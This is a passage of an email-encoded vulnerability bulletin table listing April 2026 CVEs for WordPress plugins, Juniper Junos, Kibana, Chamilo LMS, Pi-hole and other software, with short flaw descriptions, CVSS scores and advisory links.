e by Pluginus.Net plugin for WordPress is vulnerable to Cross-Site Request = Forgery in all versions up to, and including, 1.1.5. This is due to missing=
nonce validation on the woobe_redraw_table_row() function. This makes it p= ossible for unauthenticated attackers to update WooCommerce product data in= cluding prices, descriptions, and other product fields via a forged request=
granted they can trick a site administrator or shop manager into performin=
g an action such as clicking on a link.</td>
<td>2026-04-08</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1672" target=3D"= _blank" rel=3D"noopener">CVE-2026-1672</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b5f= aa-1a29-4fa7-9146-d782adce0b1f?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b5faa-1a2= 9-4fa7-9146-d782adce0b1f?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/woo-bulk-editor/trunk/index.php#L782" target=3D"_bl= ank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/woo-bulk-e= ditor/trunk/index.php#L782</a><br><a href=3D"https://plugins.trac.wordpress= .org/changeset/3457263/" target=3D"_blank" rel=3D"noopener">https://plugins= .trac.wordpress.org/changeset/3457263/</a><br><a href=3D"https://plugins.tr= ac.wordpress.org/changeset/3465138/" target=3D"_blank" rel=3D"noopener">htt= ps://plugins.trac.wordpress.org/changeset/3465138/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">wpeverest--User Registration &amp; Membership = Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profi= le, Custom User Registration &amp; Login Builder</td>
<td>The User Registration &amp; Membership - Free &amp; Paid Memberships, S= ubscriptions, Content Restriction, User Profile, Custom User Registration &= amp; Login Builder plugin for WordPress is vulnerable to SQL Injection via = the 'membership_ids[]' parameter in all versions up to, and including, 5.1.=
2 due to insufficient escaping on the user supplied parameter and lack of s= ufficient preparation on the existing SQL query. This makes it possible for=
authenticated attackers, with Subscriber-level access and above, to append=
additional SQL queries into already existing queries that can be used to e= xtract sensitive information from the database.</td>
<td>2026-04-08</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1865" target=3D"= _blank" rel=3D"noopener">CVE-2026-1865</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/07c794= 59-66b8-4c93-a1cd-6e3ede95643f?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/07c79459-66b= 8-4c93-a1cd-6e3ede95643f?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/changeset/3469042/user-registration" target=3D"_blank" rel= =3D"noopener">https://plugins.trac.wordpress.org/changeset/3469042/user-reg= istration</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--Intel(R) Pentium(R) Processor Silver Seri= es, Intel(R) Celeron(R) Processor J Series, Intel(R) Celeron(R) Processor N=
Series may allow an escalation of privilege. Hardware reverse engineer adv= ersary with a privileged user combined with a high complexity attack may en= able escalation of privilege. This result may potentially occur via physica=
l access when attack requirements are present with special internal knowled=
ge and requires no user interaction. The potential vulnerability may impact=
the confidentiality (high), integrity (none) and availability (none) of th=
e vulnerable system, resulting in subsequent system confidentiality (high),=
integrity (high) and availability (none) impacts.</td>
<td>Use of Default Cryptographic Key in the hardware for some Intel(R) Pent= ium(R) Processor Silver Series, Intel(R) Celeron(R) Processor J Series, Int= el(R) Celeron(R) Processor N Series may allow an escalation of privilege. H= ardware reverse engineer adversary with a privileged user combined with a h= igh complexity attack may enable escalation of privilege. This result may p= otentially occur via physical access when attack requirements are present w= ith special internal knowledge and requires no user interaction. The potent= ial vulnerability may impact the confidentiality (high), integrity (none) a=
nd availability (none) of the vulnerable system, resulting in subsequent sy= stem confidentiality (high), integrity (high) and availability (none) impac= ts.</td>
<td>2026-04-08</td>
<td>6.6</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-20709" target=3D= "_blank" rel=3D"noopener">CVE-2026-20709</a></td>

<a href=3D"https://intel.com/content/www/us/en/security-center/advisory/int= el-sa-00609.html" target=3D"_blank" rel=3D"noopener">https://intel.com/cont= ent/www/us/en/security-center/advisory/intel-sa-00609.html</a><br>=C2=A0</t=

</tr>

<td class=3D"vendor-product">Juniper Networks--Junos Space</td>
<td>An Improper Neutralization of Input During Web Page Generation ('Cross-= site Scripting') vulnerability in Juniper Networks Junos Space allows an at= tacker to inject script tags in the list filter field that, when visited by=
another user, enables the attacker to execute commands with the target's p= ermissions, including an administrator. This issue affects all versions of = Junos Space before 24.1R5 Patch V3.</td>
<td>2026-04-09</td>
<td>6.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21904" target=3D= "_blank" rel=3D"noopener">CVE-2026-21904</a></td>

<a href=3D"https://kb.juniper.net/JSA106003" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA106003</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--JSI LWC</td>
<td>A Permissive List of Allowed Input vulnerability in the CLI of Juniper = Networks Support Insights (JSI) Virtual Lightweight Collector (vLWC) allows=
a local, high privileged attacker to escalate their privileges to root. Th=
e CLI menu accepts input without carefully validating it, which allows for = shell command injection. These shell commands are executed with root permis= sions and can be used to gain complete control of the system. This issue af= fects all JSI vLWC versions before 3.0.94.</td>
<td>2026-04-09</td>
<td>6.7</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21915" target=3D= "_blank" rel=3D"noopener">CVE-2026-21915</a></td>

<a href=3D"https://kb.juniper.net/JSA106016" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA106016</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>An Incorrect Synchronization vulnerability in the management daemon (mg=
d) of Juniper Networks Junos OS and Junos OS Evolved allows a network-based=
attacker with low privileges to cause a complete Denial-of-Service (DoS) o=
f the management plane. When NETCONF sessions are quickly established and d= isconnected, a locking issue causes mgd processes to hang in an unusable st= ate. When the maximum number of mgd processes has been reached, no new logi=
ns are possible. This leads to the inability to manage the device and requi= res a power-cycle to recover. This issue can be monitored by checking for m=
gd processes in lockf state in the output of 'show system processes extensi= ve': user@host&gt; show system processes extensive | match mgd &lt;pid&gt; = root =C2=A0 =C2=A0 =C2=A0 20 =C2=A0 0 501M 4640K lockf =C2=A0 1 0:01 0.00% = mgd If the system still can be accessed (either via the CLI or as root, whi=
ch might still be possible as last resort as this won't invoke mgd), mgd pr= ocesses in this state can be killed with 'request system process terminate = &lt;PID&gt;' from the CLI or with 'kill -9 &lt;PID&gt;' from the shell.=C2=
=A0 This issue affects: Junos OS: * 23.4 versions before 23.4R2-S4, * 24.2 = versions before 24.2R2-S1, * 24.4 versions before 24.4R1-S3, 24.4R2; This i= ssue does not affect Junos OS versions before 23.4R1; Junos OS Evolved: * 2= 3.4 versions before 23.4R2-S5-EVO, * 24.2 versions before 24.2R2-S1-EVO, * = 24.4 versions before 24.4R1-S3-EVO, 24.4R2-EVO. This issue does not affect = Junos OS Evolved versions before 23.4R1-EVO;</td>
<td>2026-04-09</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21919" target=3D= "_blank" rel=3D"noopener">CVE-2026-21919</a></td>

<a href=3D"https://kb.juniper.net/JSA106019" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA106019</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">addfunc--AddFunc Head &amp; Footer Code</td> <td>The AddFunc Head &amp; Footer Code plugin for WordPress is vulnerable t=
o Stored Cross-Site Scripting via the `aFhfc_head_code`, `aFhfc_body_code`,=
and `aFhfc_footer_code` post meta values in all versions up to, and includ= ing, 2.3. This is due to the plugin outputting these meta values without an=
y sanitization or escaping. While the plugin restricts its own metabox and = save handler to administrators via `current_user_can('manage_options')`, it=
does not use `register_meta()` with an `auth_callback` to protect these me=
ta keys. This makes it possible for authenticated attackers, with Contribut= or-level access and above, to inject arbitrary web scripts via the WordPres=
s Custom Fields interface that execute when an administrator previews or vi= ews the post.</td>
<td>2026-04-10</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-2305" target=3D"= _blank" rel=3D"noopener">CVE-2026-2305</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2d1a= 67-1d9b-4b73-988e-085eaa7474c6?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2d1a67-1d9= b-4b73-988e-085eaa7474c6?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-foot= er-code.php#L63" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wo= rdpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-c= ode.php#L63</a><br><a href=3D"https://plugins.trac.wordpress.org/browser/ad= dfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L74" target=3D= "_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/addfun= c-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L74</a><br><a href= =3D"https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tag= s/2.3/addfunc-head-footer-code.php#L85" target=3D"_blank" rel=3D"noopener">= https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.= 3/addfunc-head-footer-code.php#L85</a><br><a href=3D"https://plugins.trac.w= ordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-cod= e.php#L63" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpres= s.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L= 63</a><br><a href=3D"https://plugins.trac.wordpress.org/browser/addfunc-hea= d-footer-code/trunk/addfunc-head-footer-code.php#L74" target=3D"_blank" rel= =3D"noopener">https://plugins.trac.wordpress.org/browser/addfunc-head-foote= r-code/trunk/addfunc-head-footer-code.php#L74</a><br><a href=3D"https://plu= gins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head= -footer-code.php#L85" target=3D"_blank" rel=3D"noopener">https://plugins.tr= ac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer= -code.php#L85</a><br><a href=3D"https://plugins.trac.wordpress.org/changese= t?old_path=3D%2Faddfunc-head-footer-code/tags/2.3&new_path=3D%2Faddfunc-hea= d-footer-code/tags/2.4" target=3D"_blank" rel=3D"noopener">https://plugins.= trac.wordpress.org/changeset?old_path=3D%2Faddfunc-head-footer-code/tags/2.= 3&new_path=3D%2Faddfunc-head-footer-code/tags/2.4</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">blubrry--PowerPress Podcasting plugin by Blubr= ry</td>
<td>The Blubrry PowerPress plugin for WordPress is vulnerable to Stored Cro= ss-Site Scripting via the 'powerpress' and 'podcast' shortcodes in versions=
up to, and including, 11.15.15 due to insufficient input sanitization and = output escaping. This makes it possible for authenticated attackers, with c= ontributor-level access and above, to inject arbitrary web scripts in pages=
that will execute whenever a user accesses an injected page.</td> <td>2026-04-08</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-2988" target=3D"= _blank" rel=3D"noopener">CVE-2026-2988</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/de2545= 9d-9e19-4e3e-982f-0b34fa89dc30?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/de25459d-9e1= 9-4e3e-982f-0b34fa89dc30?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/changeset/3473781/powerpress" target=3D"_blank" rel=3D"noop= ener">https://plugins.trac.wordpress.org/changeset/3473781/powerpress</a><b= r>=C2=A0</td>
</tr>

<td class=3D"vendor-product">fernandobt--List category posts</td>
<td>The List category posts plugin for WordPress is vulnerable to Stored Cr= oss-Site Scripting via the plugin's 'catlist' shortcode in all versions up = to, and including, 0.94.0 due to insufficient input sanitization and output=
escaping on user supplied attributes. This makes it possible for authentic= ated attackers, with contributor-level access and above, to inject arbitrar=
y web scripts in pages that will execute whenever a user accesses an inject=
ed page.</td>
<td>2026-04-09</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3005" target=3D"= _blank" rel=3D"noopener">CVE-2026-3005</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/1a93ff= 8a-364f-4ec4-9c32-208c7a3e1fc1?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/1a93ff8a-364= f-4ec4-9c32-208c7a3e1fc1?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/list-category-posts/trunk/include/lcp-thumbnail.php= #L95" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org= /browser/list-category-posts/trunk/include/lcp-thumbnail.php#L95</a><br><a = href=3D"https://plugins.trac.wordpress.org/changeset/3482733/" target=3D"_b= lank" rel=3D"noopener">https://plugins.trac.wordpress.org/changeset/3482733= /</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">uniquecodergmailcom--Pinterest Site Verificati=
on plugin using Meta Tag</td>
<td>The Pinterest Site Verification plugin using Meta Tag plugin for WordPr= ess is vulnerable to Stored Cross-Site Scripting via the 'post_var' paramet=
er in versions up to, and including, 1.8 due to insufficient input sanitiza= tion and output escaping. This makes it possible for authenticated attacker=
s, with subscriber-level access and above, to inject arbitrary web scripts =
in pages that will execute whenever a user accesses an injected page.</td> <td>2026-04-08</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3142" target=3D"= _blank" rel=3D"noopener">CVE-2026-3142</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/7ccb75= 34-b588-4bdd-9627-0e38c0ee5e8a?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/7ccb7534-b58= 8-4bdd-9627-0e38c0ee5e8a?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaT= agSiteVerification.php#L160" target=3D"_blank" rel=3D"noopener">https://plu= gins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/Pinter= estMetaTagSiteVerification.php#L160</a><br><a href=3D"https://plugins.trac.= wordpress.org/browser/pinterest-site-verification/trunk/PinterestMetaTagSit= eVerification.php#L160" target=3D"_blank" rel=3D"noopener">https://plugins.= trac.wordpress.org/browser/pinterest-site-verification/trunk/PinterestMetaT= agSiteVerification.php#L160</a><br><a href=3D"https://plugins.trac.wordpres= s.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVeri= fication.php#L172" target=3D"_blank" rel=3D"noopener">https://plugins.trac.= wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTag= SiteVerification.php#L172</a><br><a href=3D"https://plugins.trac.wordpress.= org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerifi= cation.php#L180" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wo= rdpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSi= teVerification.php#L180</a><br><a href=3D"https://plugins.trac.wordpress.or= g/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerifica= tion.php#L92" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordp= ress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteV= erification.php#L92</a><br><a href=3D"https://plugins.trac.wordpress.org/br= owser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification= .php#L132" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpres= s.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVeri= fication.php#L132</a><br><a href=3D"https://plugins.trac.wordpress.org/brow= ser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.p= hp#L214" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.= org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerifi= cation.php#L214</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">wpchill--Strong Testimonials</td>
<td>The Strong Testimonials plugin for WordPress is vulnerable to Stored Cr= oss-Site Scripting via the plugin's testimonial_view shortcode in all versi= ons up to, and including, 3.2.21 due to insufficient input sanitization and=
output escaping on user supplied attributes. This makes it possible for au= thenticated attackers, with contributor-level access and above, to inject a= rbitrary web scripts in pages that will execute whenever a user accesses an=
injected page.</td>
<td>2026-04-08</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3239" target=3D"= _blank" rel=3D"noopener">CVE-2026-3239</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/88d769= cd-bea8-42e4-80a8-a77c0699b50c?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/88d769cd-bea= 8-42e4-80a8-a77c0699b50c?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/changeset/3470120/strong-testimonials" target=3D"_blank" re= l=3D"noopener">https://plugins.trac.wordpress.org/changeset/3470120/strong-= testimonials</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">posimyththemes--The Plus Addons for Elementor = Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce</td> <td>The The Plus Addons for Elementor - Addons for Elementor, Page Template=
s, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to St= ored Cross-Site Scripting via the plugin's Progress Bar shortcode in all ve= rsions up to, and including, 6.4.9 due to insufficient input sanitization a=
nd output escaping on user supplied attributes. This makes it possible for = authenticated attackers, with contributor-level access and above, to inject=
arbitrary web scripts in pages that will execute whenever a user accesses =
an injected page.</td>
<td>2026-04-08</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3311" target=3D"= _blank" rel=3D"noopener">CVE-2026-3311</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/6367c5= fc-f664-4105-a1b7-a93fb0a2392b?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/6367c5fc-f66= 4-4105-a1b7-a93fb0a2392b?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/changeset/3473275/the-plus-addons-for-elementor-page-builde=
r" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/ch= angeset/3473275/the-plus-addons-for-elementor-page-builder</a><br>=C2=A0</t=

</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, an In= secure Direct Object Reference (IDOR) vulnerability in the REST API stats e= ndpoint allows any authenticated user (including low-privilege students wit=
h ROLE_USER) to read any other user's learning progress, certificates, and = gradebook scores for any course, without enrollment or supervisory relation= ship. This vulnerability is fixed in 2.0.0-RC.3.</td>
<td>2026-04-10</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33141" target=3D= "_blank" rel=3D"noopener">CVE-2026-33141</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= j2pr-2r5w-jrpj" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-j2pr-2r5w-jrpj</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/792ba05953470ca971617fe2674ed14= c1479fa80" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/792ba05953470ca971617fe2674ed14c1479fa80</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">pi-hole--web</td>
<td>Pi-hole Admin Interface is a web interface for managing Pi-hole, a netw= ork-level ad and internet tracker blocking application. From 6.0 to before = 6.5, a reflected DOM-based XSS vulnerability in taillog.js allows an unauth= enticated attacker to inject arbitrary HTML into the Pi-hole admin interfac=
e by crafting a malicious URL. The file query parameter is interpolated int=
o an innerHTML assignment without escaping. Because the Content-Security-Po= licy is missing the form-action directive, injected &lt;form&gt; elements c=
an exfiltrate credentials to an external origin. This vulnerability is fixe=
d in 6.5.</td>
<td>2026-04-06</td>
<td>6.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33403" target=3D= "_blank" rel=3D"noopener">CVE-2026-33403</a></td>

<a href=3D"https://github.com/pi-hole/web/security/advisories/GHSA-7xqw-r9p= r-qv59" target=3D"_blank" rel=3D"noopener">https://github.com/pi-hole/web/s= ecurity/advisories/GHSA-7xqw-r9pr-qv59</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Elastic--Kibana</td>
<td>Server-Side Request Forgery (CWE-918) in Kibana One Workflow can lead t=
o information disclosure. An authenticated user with workflow creation and = execution privileges can bypass host allowlist restrictions in the Workflow=
s Execution Engine, potentially exposing sensitive internal endpoints and d= ata.</td>
<td>2026-04-08</td>
<td>6.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33458" target=3D= "_blank" rel=3D"noopener">CVE-2026-33458</a></td>

<a href=3D"https://discuss.elastic.co/t/kibana-9-3-3-security-update-esa-20= 26-28/385815" target=3D"_blank" rel=3D"noopener">https://discuss.elastic.co= /t/kibana-9-3-3-security-update-esa-2026-28/385815</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Elastic--Kibana</td>
<td>Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denia=
l of service via Excessive Allocation (CAPEC-130). An authenticated user wi=
th access to the automatic import feature can submit specially crafted requ= ests with excessively large input values. When multiple such requests are s= ent concurrently, the backend services become unstable, resulting in servic=
e disruption and deployment unavailability for all users.</td> <td>2026-04-08</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33459" target=3D= "_blank" rel=3D"noopener">CVE-2026-33459</a></td>

<a href=3D"https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security= -update-esa-2026-26/385814" target=3D"_blank" rel=3D"noopener">https://disc= uss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-26/385= 814</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38, the get_= user_info_from_username REST API endpoint returns personal information (ema= il, first name, last name, user ID, active status) of any user to any authe= nticated user, including students. There is no authorization check. This vu= lnerability is fixed in 1.11.38.</td>
<td>2026-04-10</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33708" target=3D= "_blank" rel=3D"noopener">CVE-2026-33708</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= qwch-82q9-q999" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-qwch-82q9-q999</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/4a119f93abbfba6fe833580f2463c8d= 4afa500c2" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/4a119f93abbfba6fe833580f2463c8d4afa500c2</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">pi-hole--pi-hole</td>
<td>Pi-hole is a Linux network-level advertisement and Internet tracker blo= cking application. Version 6.4 has a local privilege-escalation vulnerabili=
ty allows code execution as root from the low-privilege pihole account. Imp= ortant context: the pihole account uses nologin, so this is not a direct in= teractive-login issue. However, nologin does not prevent code from running =
as UID pihole if a Pi-hole component is compromised. In that realistic post= -compromise scenario, attacker-controlled content in /etc/pihole/versions i=
s sourced by root-run Pi-hole scripts, leading to root code execution. This=
vulnerability is fixed in 6.4.1.</td>
<td>2026-04-06</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33727" target=3D= "_blank" rel=3D"noopener">CVE-2026-33727</a></td>

<a href=3D"https://github.com/pi-hole/pi-hole/security/advisories/GHSA-c935= -8g63-qp74" target=3D"_blank" rel=3D"noopener">https://github.com/pi-hole/p= i-hole/security/advisories/GHSA-c935-8g63-qp74</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, any a= uthenticated user (including ROLE_STUDENT) can enumerate all platform users=
and access personal information (email, phone, roles) via GET /api/users, = including administrator accounts. This vulnerability is fixed in 2.0.0-RC.3= .</td>
<td>2026-04-10</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33736" target=3D= "_blank" rel=3D"noopener">CVE-2026-33736</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= fp2p-fj6c-x3x9" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-fp2p-fj6c-x3x9</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/1739371ce1c562c007c7f5d53e6d65b= 7a4ff4109" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/1739371ce1c562c007c7f5d53e6d65b7a4ff4109</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">trailofbits--rfc3161-client</td> <td>rfc3161-client is a Python library implementing the Time-Stamp Protocol=
(TSP) described in RFC 3161. Prior to 1.0.6, an Authorization Bypass vulne= rability in rfc3161-client's signature verification allows any attacker to = impersonate a trusted TimeStamping Authority (TSA). By exploiting a logic f= law in how the library extracts the leaf certificate from an unordered PKCS=
#7 bag of certificates, an attacker can append a spoofed certificate matchi=
ng the target common_name and Extended Key Usage (EKU) requirements. This t= ricks the library into verifying these authorization rules against the forg=
ed certificate while validating the cryptographic signature against an actu=
al trusted TSA (such as FreeTSA), thereby bypassing the intended TSA author= ization pinning entirely. This vulnerability is fixed in 1.0.6.</td> <td>2026-04-08</td>
<td>6.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33753" target=3D= "_blank" rel=3D"noopener">CVE-2026-33753</a></td>

<a href=3D"https://github.com/trailofbits/rfc3161-client/security/advisorie= s/GHSA-3xxc-pwj6-jgrj" target=3D"_blank" rel=3D"noopener">https://github.co= m/trailofbits/rfc3161-client/security/advisories/GHSA-3xxc-pwj6-jgrj</a><br= >=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>An Improper Check for Unusual or Exceptional Conditions vulnerability i=
n the packet forwarding engine (pfe) of Juniper Networks Junos OS on MX Ser= ies allows an unauthenticated, network-based attacker to bypass the configu= red firewall filter and access the control-plane of the device. On MX platf= orms with MPC10, MPC11, LC4800 or LC9600 line cards, and MX304, firewall fi= lters applied on a loopback interface lo0.n (where n is a non-0 number) don=
't get executed when lo0.n is in the global VRF / default routing-instance.=
An affected configuration would be: user@host# show configuration interfac=
es lo0 | display set set interfaces lo0 unit 1 family inet filter input &lt= ;filter-name&gt; where a firewall filter is applied to a non-0 loopback int= erface, but that loopback interface is not referred to in any routing-insta= nce (RI) configuration, which implies that it's used in the default RI. The=
issue can be observed with the CLI command: user@device&gt; show firewall = counter filter &lt;filter_name&gt; not showing any matches. This issue affe= cts Junos OS on MX Series: * all versions before 23.2R2-S6, * 23.4 versions=
before 23.4R2-S7, * 24.2 versions before 24.2R2, * 24.4 versions before 24= .4R2.</td>
<td>2026-04-09</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33774" target=3D= "_blank" rel=3D"noopener">CVE-2026-33774</a></td>

<a href=3D"https://kb.juniper.net/JSA107865" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107865</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>A Missing Release of Memory after Effective Lifetime vulnerability in t=
he BroadBand Edge subscriber management daemon (bbe-smgd) of Juniper Networ=
ks Junos OS on MX Series allows an adjacent, unauthenticated attacker to ca= use a Denial of Service (DoS). If the authentication packet-type option is = configured and a received packet does not match that packet type, the memor=
y leak occurs. When all memory available to bbe-smgd=C2=A0has been consumed=
, no new subscribers will be able to login. The memory utilization of bbe-s= mgd can be monitored with the following show command: user@host&gt; show sy= stem processes extensive | match bbe-smgd The below log message can be obse= rved when this limit has been reached: bbesmgd[&lt;PID&gt;]: %DAEMON-3-SMD_= DPROF_RSMON_ERROR: Resource unavailability, Reason: Daemon Heap Memory exha= ustion This issue affects Junos OS on MX Series: * all versions before 22.4= R3-S8, * 23.2 versions before 23.2R2-S5, * 23.4 versions before 23.4R2-S6, =
* 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2, * 25.2 ver= sions before 25.2R2.</td>
<td>2026-04-09</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33775" target=3D= "_blank" rel=3D"noopener">CVE-2026-33775</a></td>

<a href=3D"https://kb.juniper.net/JSA107821" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107821</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>An Improper Following of a Certificate's Chain of Trust vulnerability i=
n J-Web of Juniper Networks Junos OS on SRX Series allows a PITM to interce=
pt the communication of the device and get access to confidential informati=
on and potentially modify it. When an SRX device is provisioned to connect =
